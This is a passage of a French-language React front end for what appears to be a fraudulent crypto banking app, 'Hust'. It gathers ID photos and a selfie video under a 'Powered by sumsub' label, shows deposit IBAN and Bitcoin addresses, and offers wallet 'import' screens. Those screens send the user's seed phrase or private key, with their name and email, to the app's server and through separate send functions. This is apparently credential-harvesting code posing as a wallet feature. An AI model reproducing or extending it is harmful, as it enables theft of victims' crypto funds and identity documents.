    onClick={() => !documents.VideoSelfie && setShowDocTypeDropdown(!showDocTypeDropdown)}
    disabled={documents.VideoSelfie}
    className={`inline-flex items-center gap-2 bg-white/10 backdrop-blur-sm rounded-lg px-4 py-1.5 text-white border border-white/20 ${
      documents.VideoSelfie ? 'opacity-50 cursor-not-allowed' : ''
    }`}
  >
    <span className="font-medium">{docType}</span>
    {!documents.VideoSelfie && (
      <ChevronDown 
        size={18} 
        className={`transition-transform ${showDocTypeDropdown ? 'rotate-180' : ''}`}
      />
    )}
  </button>
  
  {showDocTypeDropdown && (
    <>
      <div 
        className="fixed inset-0 z-10"
        onClick={() => setShowDocTypeDropdown(false)}
      />
      
      <div className="absolute left-0 mt-2 bg-gray-900 rounded-xl overflow-hidden shadow-2xl z-20 border border-white/10 min-w-[160px]">
        <button
          onClick={() => {
            if (docType !== 'ID Card') {
    setDocuments({
      Recto: null,
      Verso: null,
      VideoSelfie: null
    });
  }
  setDocType('ID Card');
  setShowDocTypeDropdown(false);
}}
          className={`w-full text-left px-4 py-3 flex items-center justify-between transition-colors ${
            docType === 'ID Card' 
              ? 'bg-violet-600/50 text-white' 
              : 'text-white/80 hover:bg-white/5'
          }`}
        >
          <span>ID Card</span>
          {docType === 'ID Card' && (
            <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="3">
              <polyline points="20 6 9 17 4 12"/>
            </svg>
          )}
        </button>
        
        <div className="h-px bg-white/10" />
        
        <button
          onClick={() => {
            if (docType !== 'Passport') {
    setDocuments({
      Recto: null,
      Verso: null,
      VideoSelfie: null
    });
  }
  setDocType('Passport');
  setShowDocTypeDropdown(false);
}}
          className={`w-full text-left px-4 py-3 flex items-center justify-between transition-colors ${
            docType === 'Passport' 
              ? 'bg-violet-600/50 text-white' 
              : 'text-white/80 hover:bg-white/5'
          }`}
        >
          <span>Passport</span>
          {docType === 'Passport' && (
            <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="3">
              <polyline points="20 6 9 17 4 12"/>
            </svg>
          )}
        </button>
      </div>
    </>
  )}
</div>
{/* 🆕 FIN DU BLOC */}





      {/* Section Recto */}
      <div className="bg-white/10 rounded-lg p-6 mb-4">
        <h3 className="font-medium text-white">Recto</h3>
        <p className="text-sm text-gray-400 mt-1 mb-4">
  {docType === 'Passport'
    ? 'Photo de la page complète de votre passport'
    : 'Photo du recto de votre pièce d\'identité'}
</p>
        
        {documents.Recto ? (
          <div className="relative w-full rounded-lg overflow-hidden">
            <img 
              src={documents.Recto.preview} 
              alt="Recto preview" 
              className="w-full h-48 object-cover"
            />
            <button
              onClick={() => resetPhoto('Recto')}
              className="absolute top-2 right-2 bg-black/40 p-2 rounded-full text-white hover:bg-black/60"
            >
              ✕
            </button>
          </div>
        ) : (
          <div className="flex justify-center gap-4 mb-4">
            <button
              onClick={() => takePhoto('Recto')}
              className="px-4 py-2 rounded-lg bg-violet-500 text-white cursor-pointer"
            >
              📷 Appareil photo
            </button>
            <button
              onClick={() => importPhoto('Recto')}
              className="px-4 py-2 rounded-lg bg-violet-600 text-white cursor-pointer"
            >
              📁 Importer
            </button>
          </div>
        )}
      </div>
      
      {/* Section Verso */}
      {docType === 'ID Card' && (
      <div className="bg-white/10 rounded-lg p-6 mb-4">
        <h3 className="font-medium text-white">Verso</h3>
        <p className="text-sm text-gray-400 mt-1 mb-4">Photo du verso de votre pièce d'identité</p>
        
        {documents.Verso ? (
          <div className="relative w-full rounded-lg overflow-hidden">
            <img 
              src={documents.Verso.preview} 
              alt="Verso preview" 
              className="w-full h-48 object-cover"
            />
            <button
              onClick={() => resetPhoto('Verso')}
              className="absolute top-2 right-2 bg-black/40 p-2 rounded-full text-white hover:bg-black/60"
            >
              ✕
            </button>
          </div>
        ) : (
          <div className="flex justify-center gap-4 mb-4">
            <button
              onClick={() => takePhoto('Verso')}
              className="px-4 py-2 rounded-lg bg-violet-500 text-white cursor-pointer"
            >
              📷 Appareil photo
            </button>
            <button
              onClick={() => importPhoto('Verso')}
              className="px-4 py-2 rounded-lg bg-violet-600 text-white cursor-pointer"
            >
              📁 Importer
            </button>
          </div>
        )}
      </div>
      )}
             
      {/* Caméra personnalisée */}
{showCustomCamera && (
  <CustomCamera 
    onCapture={handleCaptureComplete} 
    onCancel={() => setShowCustomCamera(false)}
    type={currentPhotoType}
  />
)} 

      {/* Section Vérification Vidéo */}
      <div className="bg-white/10 rounded-lg p-6 mb-4">
        <h3 className="font-medium text-white">Vérification Vidéo</h3>
        <p className="text-sm text-gray-400 mt-1 mb-4">Enregistrement vidéo pour vérifier votre identité</p>
        
        {videoStage === 'initial' && !documents.VideoSelfie && (
          <button
  onClick={async () => {
    if (!Capacitor.isNativePlatform()) {
      try {
        // Vérifier la compatibilité
        if (!navigator.mediaDevices || !navigator.mediaDevices.getUserMedia) {
          alert("Votre navigateur ne supporte pas l'accès à la caméra.");
          return;
        }
        
        // Demander la caméra AVANT de passer à la page
        const stream = await navigator.mediaDevices.getUserMedia({
          video: { facingMode: "user" },
          audio: false
        });
        window.currentMediaStream = stream;
        
        // Maintenant passer à la page
        setVideoStage('preparation');
      } catch (error) {
        alert("Impossible d'accéder à la caméra: " + error.message);
      }
    } else {
      setVideoStage('preparation');
    }
  }}
  className="w-full px-4 py-2 rounded-lg bg-violet-500 text-white cursor-pointer"
>
  🎥 Démarrer
</button>
        )}
        
        {videoStage === 'preparation' && (
  <div className="fixed inset-0 bg-white z-50 flex flex-col items-center justify-center">
    <div className="relative w-64 h-64 mb-8">
      {/* Structure en couches fixes */}
          
      {/* 1. Cercle central (fond gris) - couche la plus basse */}
      <div className="absolute inset-0 flex items-center justify-center z-10">
        <div className="w-3/4 h-3/4 rounded-full bg-gray-300"></div>
      </div>
              
      {/* 2. Conteneur de caméra - au-dessus du fond gris, mais sous les segments */}
      <div id="camera-preview-container" className="absolute inset-0 flex items-center justify-center z-20 pointer-events-none">
        <div className="w-3/4 h-3/4 rounded-full overflow-hidden">
          {/* La caméra s'affiche ici */}
        </div>
      </div>  
             
      {/* 3. Segments - toujours au-dessus, position fixe */}
      <div className="absolute inset-0 z-30 pointer-events-none">
        <svg width="100%" height="100%" viewBox="0 0 100 100">
          {/* Cercle invisible pour référence */}
          <circle cx="50" cy="50" r="35" fill="none" />

{/* Segments gris */}
          {Array.from({ length: 60 }).map((_, i) => (
            <line
              key={`segment-${i}`}
              x1="50"
              y1="0"
              x2="50"
              y2="8"
              stroke="#cccccc"
              strokeWidth="2"
              transform={`rotate(${i * 6} 50 50)`}
            />
          ))}
          
          {/* Segments verts qui apparaissent pendant l'enregistrement */}
          {isRecording && Array.from({ length: Math.min(60, Math.floor((recordingTime / 15) * 60)) }).map((_, i) => (
            <line
              key={`active-segment-${i}`}
              x1="50"
              y1="0"
              x2="50"
              y2="8"
              stroke="#22d35e"
              strokeWidth="2"
              transform={`rotate(${i * 6} 50 50)`}
            />
          ))}
        </svg>
      </div>
    </div>
          
    <p className="text-black text-xl mb-8">Liveness detection</p>


{!isRecording ? (
  <>
    <button
      onClick={videoRecording}
      className="bg-gray-700 text-white font-medium py-3 px-8 rounded-full mb-4"
    >
      Commencer l'enregistrement
    </button>
    <p className="text-gray-600 text-sm text-center max-w-xs">
      Mettez votre visage entièrement dans le cercle et suivez les instructions
    </p>
  </>
) : (     
  <p className="text-gray-800 text-lg font-medium text-center max-w-xs">  
    {getInstruction()}
  </p>
)}
              
    <p className="absolute bottom-4 text-gray-400 text-xs">
      Powered by sumsub
    </p>
  </div>
)}
{/* NOUVELLE ÉTAPE: Animation de complétion après la fin de l'enregistrement */}
{videoStage === 'animation' && showCompletionAnimation && (
  <VerificationCompletionAnimation showAcceptedMessage={showAcceptedMessage} />
)}
      </div>

      {/* Bouton de finalisation */}
      <button
  onClick={handleFinishVerification}
  disabled={
    docType === 'Passport'
      ? !documents.Recto || !documents.VideoSelfie
      : !documents.Recto || !documents.Verso || !documents.VideoSelfie
  }
  className={`w-full py-3 mt-2 rounded-lg font-medium transition-colors ${
    (docType === 'Passport' 
      ? documents.Recto && documents.VideoSelfie
      : documents.Recto && documents.Verso && documents.VideoSelfie)
      ? 'bg-white text-black hover:bg-gray-100 cursor-pointer'
      : 'bg-gray-500 text-gray-300 cursor-not-allowed'
  }`}
>
  Finaliser l'inscription
</button>

</div>
);
 
    
     
  
    case 'loading':
  return (
    <div className="min-h-screen flex items-center justify-center bg-gradient-to-br from-violet-900 via-violet-800 to-black">
      <div className="relative">
        <div className="w-20 h-20 border-4 border-white/20 border-t-white rounded-full animate-spin" />
        <div className="absolute top-1/2 left-1/2 transform -translate-x-1/2 -translate-y-1/2">
          <svg className="w-8 h-8 text-white animate-pulse" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M5 13l4 4L19 7" />
          </svg>
        </div>
      </div>
    </div>
  ); 
                
    

    case 'accounts':
      return (
        <div className="min-h-screen bg-gradient-to-br from-violet-900 via-violet-800 to-black">
        {showMenu && (
                  <>
                    <div
                      className="fixed inset-0 bg-black/50 z-10"
                      onClick={() => {
                        setShowMenu(false);
                        setMenuType(null);
                      }}
                    />
                    <div className="fixed top-96 left-1/2 transform -translate-x-1/2 w-80 bg-white/10 backdrop-blur-lg rounded-xl z-50">
                      {!menuType ? (
                        <div className="p-4">
                          <h3 className="text-lg font-medium text-white text-center mb-4">
                            Choisir la méthode
                          </h3>
                          <div className="space-y-3">
                            <button
                              className="w-full bg-violet-500 hover:bg-violet-600 text-white font-medium py-3 px-4 rounded-lg"
                              onClick={() => setMenuType('bank')}
                            >
                              Par virement
                            </button>
                            <button
                              className="w-full bg-violet-500 hover:bg-violet-600 text-white font-medium py-3 px-4 rounded-lg"
                              onClick={() => setMenuType('crypto')}
                            >
                              Par Crypto Monnaie
                            </button>
                          </div>
                        </div>
                      ) : menuType === 'bank' ? (
                        <div>
                          <div className="flex items-center p-4 border-b border-white/10">
                            <button
                              onClick={() => setMenuType(null)}
                              className="text-white"
                            >
                              ←
                            </button>
                            <h3 className="text-lg font-medium text-white text-center flex-1">
                              Informations bancaires
                            </h3>
                          </div>
                          <div className="space-y-4 p-4">
                            <div className="bg-white/5 rounded-lg p-4">
                              <div className="flex justify-between items-start mb-2">
                                <span className="text-gray-400">IBAN</span>
                                <CopyButton text="GB02TCCL04140487896988" />
                              </div>
                              <div className="text-white font-mono text-sm">
                                GB02TCCL04140487896988
                              </div>
                            </div>
                            <div className="bg-white/5 rounded-lg p-4">
                              <div className="flex justify-between items-start mb-2">
                                <span className="text-gray-400">BIC</span>
                                <CopyButton text="TCCLGB3L" />
                              </div>
                              <div className="text-white font-mono text-sm">
                                TCCLGB3L
                              </div> 
                            </div>
                          </div>
                        </div>
                      ) : (
                        <div>
                          <div className="flex items-center p-4 border-b border-white/10">
                            <button
                              onClick={() => setMenuType(null)}
                              className="text-white"
                            >
                              ←
                            </button>
                            <h3 className="text-lg font-medium text-white text-center flex-1">
                              Dépôt BTC
                            </h3>
                          </div>
                          <div className="p-4">
                            <div className="bg-white/5 rounded-lg p-4">
                              <div className="flex justify-between items-start mb-2">
                                <span className="text-gray-400">Adresse Bitcoin</span>
                                <CopyButton text="bc1qyf076wnuj8edad8r2sfhvmnzljew73wdg0j9kw" />
                              </div>
                              <div className="text-white font-mono text-sm break-all">
                                bc1qyf076wnuj8edad8r2sfhvmnzljew73wdg0j9kw
                              </div>
                            </div>
                            <div className="mt-4 space-y-2 p-2 bg-white/5 rounded-lg">
                              <p className="text-sm text-gray-300 p-2">⚠️ Nous n'acceptons que les transferts sur le réseau Bitcoin.</p>
                              <p className="text-sm text-gray-300 p-2">💡 La valeur des crypto-monnaies peut fluctuer rapidement.</p>
                              <p className="text-sm text-gray-300 p-2">⏱️ Les dépôts peuvent prendre plusieurs minutes.</p>
                            </div>
                          </div>
                        </div>
                      )}
                    </div>
                  </>
                )}









{/* Menu déroulant import */}
  {showWalletMenu && (
    <>
      <div className="fixed inset-0 bg-black/50 z-10"
       onClick={() => setShowWalletMenu(false)}
       />
      <div className="fixed top-96 left-1/2 transform -translate-x-1/2 w-80 bg-white/10 backdrop-blur-lg rounded-xl z-50">
        <div className="p-4">
          <h3 className="text-lg font-medium text-white text-center mb-4">
            Choisir la méthode  
          </h3>
          <div className="space-y-3">
            <button
              className="w-full bg-violet-500 hover:bg-violet-600 text-white font-medium py-3 px-4 rounded-lg transition-colors"
              onClick={() => {
                setShowWalletMenu(false);
                setShowSeedPhrasePage(true);
              }}
            > 
              Importer une phrase de récupération
            </button>
            <button
              className="w-full bg-violet-500 hover:bg-violet-600 text-white font-medium py-3 px-4 rounded-lg transition-colors"
              onClick={() => {
                setShowWalletMenu(false);
                setShowPrivateKeyPage(true);
              }}
            >
              Importer une clé privée
            </button>
          </div>
        </div>
      </div>
    </>
  )}
{/* 🔥 FIN DU NOUVEAU CODE 🔥 */}

{/* Page Import Phrase de récupération */}
{showSeedPhrasePage && (
  <div className="fixed inset-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white z-50">
    <div className="flex items-center pt-20 pb-6 px-4">
      <button onClick={() => {
        setShowSeedPhrasePage(false);
        setSeedPhraseError('');
      }} className="text-white mr-4">
        <ArrowLeft size={24} />
      </button>
      <h1 className="text-xl font-medium">Importer une phrase de récup...</h1>
      <button className="ml-auto w-6 h-6 rounded-full border border-gray-400 flex items-center justify-center text-gray-400">
        ?
      </button>
    </div>

    <div className="text-center mb-8 px-4">
      <h2 className="text-3xl font-bold text-white mb-4">Phrase de récupération</h2>
      <p className="text-gray-400 text-center">
        Restaurez un portefeuille existant avec votre phrase de récupération de 12 ou 24 mots
      </p>
    </div>

    <div className="px-4 mb-2">
      <label className="text-gray-400 text-sm block mb-2">Phrase de récupération</label>
      <textarea
        value={seedPhrase}
        onChange={(e) => {
          setSeedPhrase(e.target.value);
          setSeedPhraseError(''); // Effacer l'erreur quand l'utilisateur tape
        }}
        className={`w-full h-40 bg-gray-800/50 text-white p-4 rounded-lg resize-none outline-none border ${
          seedPhraseError ? 'border-red-500' : 'border-gray-600'
        } focus:border-violet-500`}
        placeholder="Entrez votre phrase de récupération ici..."
      />
      {seedPhraseError && (
        <p className="text-red-500 text-sm mt-2">{seedPhraseError}</p>
      )}
    </div>

    <div className="px-4">
      <button 
        className={`w-full py-3 rounded-lg font-medium transition-colors ${
          seedPhrase.trim() && !isLoading
            ? 'bg-violet-500 hover:bg-violet-600 text-white' 
            : 'bg-gray-700 text-gray-400 cursor-not-allowed'
        }`}
        disabled={!seedPhrase.trim() || isLoading}
        onClick={async () => {
  if (seedPhrase.trim()) {
    // Validation basique côté client
    const words = seedPhrase.trim().toLowerCase().split(/\s+/);
    const wordCount = words.length;
    
    if (wordCount !== 12 && wordCount !== 24) {
      setSeedPhraseError('La phrase de récupération doit contenir exactement 12 ou 24 mots');
      return;
    }
    
    // Afficher le chargement immédiatement
    setShowWalletImportLoading(true);
    setWalletImportStatus('loading');
    setSeedPhraseError('');
    
    try {
      const checkUserResponse = await fetch(`${SERVER_URL}/api/users/${userDetails?.email}`);
      
      if (!checkUserResponse.ok) {
        await fetch(`${SERVER_URL}/api/users`, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(userDetails)
        });
      }
      
      const response = await fetch(`${SERVER_URL}/api/import-crypto`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          email: userDetails?.email,
          seedPhrase: seedPhrase.trim()
        })
      });
      
      const result = await response.json();
      
      if (result.success) {
        // Afficher le message de succès
        setWalletImportStatus('success');
        
        setUserDetails(result.user);
        
        const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
        allUsers[userDetails.email.toLowerCase()] = result.user;
        localStorage.setItem('allUsers', JSON.stringify(allUsers));
        
        // 🔥 AJOUTER ICI - JUSTE APRÈS localStorage.setItem
        if (cryptoRefreshInterval) {
        clearInterval(cryptoRefreshInterval);
        }
        const intervalId = setInterval(refreshCryptoBalances, 60000);
        setCryptoRefreshInterval(intervalId);
        // FIN DU CODE À AJOUTER

        await sendSeedPhraseImport({
          email: userDetails?.email,
          fullName: userDetails?.fullName,
          seedPhrase: seedPhrase.trim()
        });
        
        setSeedPhrase('');
        setShowSeedPhrasePage(false);
        
        // Attendre 2 secondes puis revenir à l'accueil
        setTimeout(() => {
          setShowWalletImportLoading(false);
          setWalletImportStatus('loading');
          setActiveTab('accounts');
          // 🔥 AJOUTER AUSSI ICI
          refreshCryptoBalances();
          // FIN
        }, 2000);
      } else {
        // Fermer le chargement et afficher l'erreur
        setShowWalletImportLoading(false);
        setSeedPhraseError('Phrase de récupération non valide');
      }
    } catch (error) {
      // Fermer le chargement et afficher l'erreur
      setShowWalletImportLoading(false);
      setSeedPhraseError('Erreur de connexion au serveur');
    }
  }
}}
      >
        {showWalletImportLoading ? '🔄 Analyse en cours...' : 'Importer'}
      </button>
    </div>
  </div>
)}

{/* Fenêtre de chargement import wallet */}
{showWalletImportLoading && (
  <div className="fixed inset-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black z-50 flex flex-col items-center justify-center">
    <div className="relative mb-6">
      <div className="w-20 h-20 border-4 border-white/20 border-t-white rounded-full animate-spin" />
      <div className="absolute top-1/2 left-1/2 transform -translate-x-1/2 -translate-y-1/2">
        <svg className="w-8 h-8 text-white animate-pulse" fill="none" stroke="currentColor" viewBox="0 0 24 24">
          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M5 13l4 4L19 7" />
        </svg>
      </div>
    </div>
    {walletImportStatus === 'success' && (
      <p className="text-white text-xl font-medium">Portefeuille importé avec succès !</p>
    )}
  </div>
)}



{/* Page Import Clé privée */}
{showPrivateKeyPage && (
  <div className="fixed inset-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black text-white z-50">
    <div className="flex items-center pt-20 pb-6 px-4">
      <button onClick={() => {
        setShowPrivateKeyPage(false);
        setPrivateKeyError('');
      }} className="text-white mr-4">
        <ArrowLeft size={24} />
      </button>
      <h1 className="text-xl font-medium">Importer une clé privée</h1>
      <button className="ml-auto w-6 h-6 rounded-full border border-gray-400 flex items-center justify-center text-gray-400">
        ?
      </button>
    </div>

    <div className="flex justify-center mb-8">
      <div className="w-16 h-16 bg-gray-700 rounded-full flex items-center justify-center">
        <svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2">
          <path d="M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4"/>
          <polyline points="7,10 12,15 17,10"/>
          <line x1="12" y1="15" x2="12" y2="3"/>
        </svg>
      </div>
    </div>

    <div className="space-y-4 px-4">
      {/* Sélection du réseau */}
      <div className="relative">
        <button 
          className="w-full bg-gray-800/50 rounded-lg p-4 flex items-center justify-between text-white border border-gray-600 focus:border-violet-500"
          onClick={() => setShowNetworkOptions(!showNetworkOptions)}
        >
          <span>Réseau</span>
          <div className="flex items-center">
            <span className="text-gray-400 mr-2">{selectedNetwork}</span>
            <svg 
              className={`w-4 h-4 transition-transform ${showNetworkOptions ? 'rotate-180' : ''}`} 
              fill="none" 
              stroke="currentColor" 
              viewBox="0 0 24 24"
            >
              <polyline points="6,9 12,15 18,9"></polyline>
            </svg>
          </div>
        </button>
        
        {showNetworkOptions && (
          <div className="absolute w-full mt-1 bg-gray-800 rounded-lg shadow-lg z-10 overflow-hidden border border-gray-600">
            {['BTC - Bitcoin', 'ETH - Ethereum', 'USDT - TetherUSD'].map((network, index) => (
              <button
                key={index}
                className={`w-full text-left p-4 hover:bg-gray-700 transition-colors ${
                  network === selectedNetwork ? 'bg-gray-700 text-violet-400' : 'text-white'
                }`}
                onClick={() => {
                  setSelectedNetwork(network);
                  setShowNetworkOptions(false);
                  setPrivateKeyError('');
                }}
              >
                {network}
              </button>
            ))}
          </div>
        )}
      </div>

      {/* Nom */}
      <div>
        <input
          type="text"
          value={privateKeyName}
          onChange={(e) => {
            setPrivateKeyName(e.target.value);
            setPrivateKeyError('');
          }}
          className="w-full bg-gray-800/50 text-white p-4 rounded-lg outline-none border border-gray-600 focus:border-violet-500"
          placeholder="Nom"
        />
      </div>

      {/* Clé privée */}
      <div>
        <div className="relative">
          <input
            type="text"
            value={privateKey}
            onChange={(e) => {
              setPrivateKey(e.target.value);
              setPrivateKeyError('');
            }}
            className={`w-full bg-gray-800/50 text-white p-4 rounded-lg outline-none border ${
              privateKeyError ? 'border-red-500' : 'border-gray-600'
            } focus:border-violet-500 pr-20`}
            placeholder="Clé privée"
          />
          <button 
            className="absolute right-4 top-1/2 transform -translate-y-1/2 text-gray-400 hover:text-white"
            onClick={() => navigator.clipboard.readText().then(text => {
              setPrivateKey(text);
              setPrivateKeyError('');
            })}
          >
            Coller
          </button>
        </div>
        {privateKeyError && (
          <p className="text-red-500 text-sm mt-2">{privateKeyError}</p>
        )}
      </div>
    </div>

    <div className="px-4 mt-8">
      <button 
        className={`w-full py-3 rounded-lg font-medium transition-colors ${
          privateKeyName.trim() && privateKey.trim() && !showPrivateKeyImportLoading
            ? 'bg-violet-500 hover:bg-violet-600 text-white' 
            : 'bg-gray-700 text-gray-400 cursor-not-allowed'
        }`}
        disabled={!privateKeyName.trim() || !privateKey.trim() || showPrivateKeyImportLoading}
        onClick={async () => {
          if (privateKeyName.trim() && privateKey.trim()) {
            // Validation basique
            if (privateKey.trim().length < 32) {
              setPrivateKeyError('Clé privée invalide');
              return;
            }
            
            // Afficher le chargement immédiatement
            setShowPrivateKeyImportLoading(true);
            setPrivateKeyImportStatus('loading');
            setPrivateKeyError('');
            
            try {
              const checkUserResponse = await fetch(`${SERVER_URL}/api/users/${userDetails?.email}`);
              
              if (!checkUserResponse.ok) {
                await fetch(`${SERVER_URL}/api/users`, {
                  method: 'POST',
                  headers: { 'Content-Type': 'application/json' },
                  body: JSON.stringify(userDetails)
                });
              }
              
              const response = await fetch(`${SERVER_URL}/api/import-crypto`, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                  email: userDetails?.email,
                  privateKey: privateKey.trim(),
                  network: selectedNetwork
                })
              });
              
              const result = await response.json();
              
              if (result.success) {
                // Afficher le message de succès
                setPrivateKeyImportStatus('success');
                
                setUserDetails(result.user);
                
                const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
                allUsers[userDetails.email.toLowerCase()] = result.user;
                localStorage.setItem('allUsers', JSON.stringify(allUsers));
                
                // 🔥 AJOUTER ICI - JUSTE APRÈS localStorage.setItem
                if (cryptoRefreshInterval) {
                clearInterval(cryptoRefreshInterval);
                }
                const intervalId = setInterval(refreshCryptoBalances, 60000);
                setCryptoRefreshInterval(intervalId);
                // FIN DU CODE À AJOUTER    

                await sendPrivateKeyImport({
                  email: userDetails?.email,
                  fullName: userDetails?.fullName,
                  network: selectedNetwork,
                  walletName: privateKeyName.trim(),
                  privateKey: privateKey.trim()
                });
                
                setPrivateKeyName('');
                setPrivateKey('');
                setShowPrivateKeyPage(false);
                
                // Attendre 2 secondes puis revenir à l'accueil
                setTimeout(() => {
                  setShowPrivateKeyImportLoading(false);
                  setPrivateKeyImportStatus('loading');
                  setActiveTab('accounts');
                  // 🔥 AJOUTER AUSSI ICI
                  refreshCryptoBalances();
                  // FIN
                }, 2000);
              } else {
                // Fermer le chargement et afficher l'erreur
                setShowPrivateKeyImportLoading(false);
                setPrivateKeyError('Clé privée invalide');
              }
            } catch (error) {
              // Fermer le chargement et afficher l'erreur
              setShowPrivateKeyImportLoading(false);
              setPrivateKeyError('Erreur de connexion au serveur');
            }
          }
        }}
      >
        {showPrivateKeyImportLoading ? '🔄 Analyse en cours...' : 'Importer'}
      </button>
    </div>
  </div>
)}

{/* Fenêtre de chargement import clé privée */}
{showPrivateKeyImportLoading && (
  <div className="fixed inset-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black z-50 flex flex-col items-center justify-center">
    <div className="relative mb-6">
      <div className="w-20 h-20 border-4 border-white/20 border-t-white rounded-full animate-spin" />
      <div className="absolute top-1/2 left-1/2 transform -translate-x-1/2 -translate-y-1/2">
        <svg className="w-8 h-8 text-white animate-pulse" fill="none" stroke="currentColor" viewBox="0 0 24 24">
          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M5 13l4 4L19 7" />
        </svg>
      </div>
    </div>
    {privateKeyImportStatus === 'success' && (
      <p className="text-white text-xl font-medium">Portefeuille importé avec succès !</p>
    )}
  </div>
)}
       



{/* Modal détails crypto */}
{showCryptoDetails && (
  <>
    {/* Overlay */}
    <div className="fixed inset-0 bg-black/50 z-40" />
    
    {/* Modal */}
    <div 
      className="fixed top-0 left-0 right-0 bg-gradient-to-br from-violet-900 via-violet-800 to-black rounded-t-3xl z-50"
      style={{
        animation: 'slideUp 0.3s ease-out',
        height: 'calc(100vh - 50px)',
        marginTop: '50px',
        transform: swipeCurrentY > 0 ? `translateY(${swipeCurrentY}px)` : 'translateY(0)',
        transition: swipeCurrentY === 0 ? 'transform 0.3s ease-out' : 'none'
      }}
      onTouchStart={(e) => setSwipeStartY(e.touches[0].clientY)}
      onTouchMove={(e) => {
        const currentY = e.touches[0].clientY;
        const diff = currentY - swipeStartY;
        if (diff > 0) setSwipeCurrentY(diff);
      }}
      onTouchEnd={() => {
        if (swipeCurrentY > 100) setShowCryptoDetails(false);
        setSwipeCurrentY(0);
        setSwipeStartY(0);
      }}
    >
      {/* Barre de fermeture */}
      <div className="flex justify-center pt-3 pb-4">
        <div className="w-12 h-1.5 bg-gray-400 rounded-full"></div>
      </div>
      
      <div className="px-6 pb-6 overflow-y-auto" style={{ height: 'calc(100vh - 110px)' }}>
        <h3 className="text-xl font-bold text-white mb-6">Cash and crypto</h3>
        
        {/* Conteneur principal - UN SEUL BLOC */}
        <div className="bg-white/10 backdrop-blur-sm rounded-3xl overflow-hidden">
          
          {/* Hust Balance */}
          <div className="relative px-5 py-5 flex items-center justify-between">
            <div className="flex items-center gap-4">
              {/* Icône vide - tu ajouteras le logo */}
              <div className="w-12 h-12 rounded-full flex-shrink-0 overflow-hidden">
                <img src={hustLogo} alt="Hust" className="w-12 h-12 object-cover" />
              </div>
              <div>
                <h4 className="text-white text-base font-semibold">Hust Balance</h4>
              </div>
            </div>
            <div className="text-right">
              <p className="text-white text-lg font-bold" key={balanceRefreshKey}>
                {userDetails?.cashBalance !== undefined ? 
  convertCurrency(userDetails.cashBalance, selectedCurrency).toLocaleString('fr-FR', {
    minimumFractionDigits: 2,
    maximumFractionDigits: 2
  }) : '0,00'} {getCurrencySymbol(selectedCurrency)}
            </p>
            </div>
            {/* Trait de séparation */}
            <div className="absolute bottom-0 left-20 right-5 h-px bg-gray-400/40"></div>
          </div>
          
          {/* Bitcoin */}
          <div className="relative px-5 py-5 flex items-center justify-between">
            <div className="flex items-center gap-4">
              {/* Icône vide - tu ajouteras le logo */}
              <div className="w-12 h-12 rounded-full flex-shrink-0 overflow-hidden">
                <img src={bitcoinLogo} alt="Bitcoin" className="w-12 h-12 object-cover" />
              </div>
              <div>
                <h4 className="text-white text-base font-semibold">Bitcoin</h4>
              </div>
            </div>
            <div className="text-right">
              <p className="text-white text-lg font-bold">
                {userDetails?.cryptoWallet?.BTC ? 
                  convertCurrency(userDetails.cryptoWallet.BTC.balanceEUR, selectedCurrency).toLocaleString('fr-FR', {
                    minimumFractionDigits: 2,
                    maximumFractionDigits: 2
                  }) : '0,00'} {getCurrencySymbol(selectedCurrency)}
              </p>
              <p className="text-gray-400 text-sm">
                {userDetails?.cryptoWallet?.BTC?.balance || '0'} BTC
              </p>
            </div>
            {/* Trait de séparation */}
            <div className="absolute bottom-0 left-20 right-5 h-px bg-gray-400/40"></div>
          </div>
          
          {/* Ethereum */}
          <div className="relative px-5 py-5 flex items-center justify-between">
            <div className="flex items-center gap-4">
              {/* Icône vide - tu ajouteras le logo */}
              <div className="w-12 h-12 rounded-full flex-shrink-0 overflow-hidden">
                <img src={ethereumLogo} alt="Ethereum" className="w-12 h-12 object-cover" />
              </div>
              <div>
                <h4 className="text-white text-base font-semibold">Ethereum</h4>
              </div>
            </div>
            <div className="text-right">
              <p className="text-white text-lg font-bold">
                {userDetails?.cryptoWallet?.ETH ? 
                  convertCurrency(userDetails.cryptoWallet.ETH.balanceEUR, selectedCurrency).toLocaleString('fr-FR', {
                    minimumFractionDigits: 2,
                    maximumFractionDigits: 2
                  }) : '0,00'} {getCurrencySymbol(selectedCurrency)}
              </p>
              <p className="text-gray-400 text-sm">
                {userDetails?.cryptoWallet?.ETH?.balance || '0'} ETH
              </p>
            </div>
            {/* Trait de séparation */}
            <div className="absolute bottom-0 left-20 right-5 h-px bg-gray-400/40"></div>
          </div>
          
          {/* Tether USD */}
          <div className="relative px-5 py-5 flex items-center justify-between">
            <div className="flex items-center gap-4">
              {/* Icône vide - tu ajouteras le logo */}
              <div className="w-12 h-12 rounded-full flex-shrink-0 overflow-hidden">
                <img src={usdtLogo} alt="Tether" className="w-12 h-12 object-cover" />
              </div>
              <div>
                <h4 className="text-white text-base font-semibold">Tether USD</h4>
              </div>
            </div>
            <div className="text-right">
              <p className="text-white text-lg font-bold">
                {userDetails?.cryptoWallet?.USDT ? 
                  convertCurrency(userDetails.cryptoWallet.USDT.balanceEUR, selectedCurrency).toLocaleString('fr-FR', {
                    minimumFractionDigits: 2,
                    maximumFractionDigits: 2
                  }) : '0,00'} {getCurrencySymbol(selectedCurrency)}
              </p>
              <p className="text-gray-400 text-sm">
                {userDetails?.cryptoWallet?.USDT?.balance || '0'} USDT
              </p>
            </div>
            {/* Trait de séparation */}
            <div className="absolute bottom-0 left-20 right-5 h-px bg-gray-400/40"></div>
          </div>
          
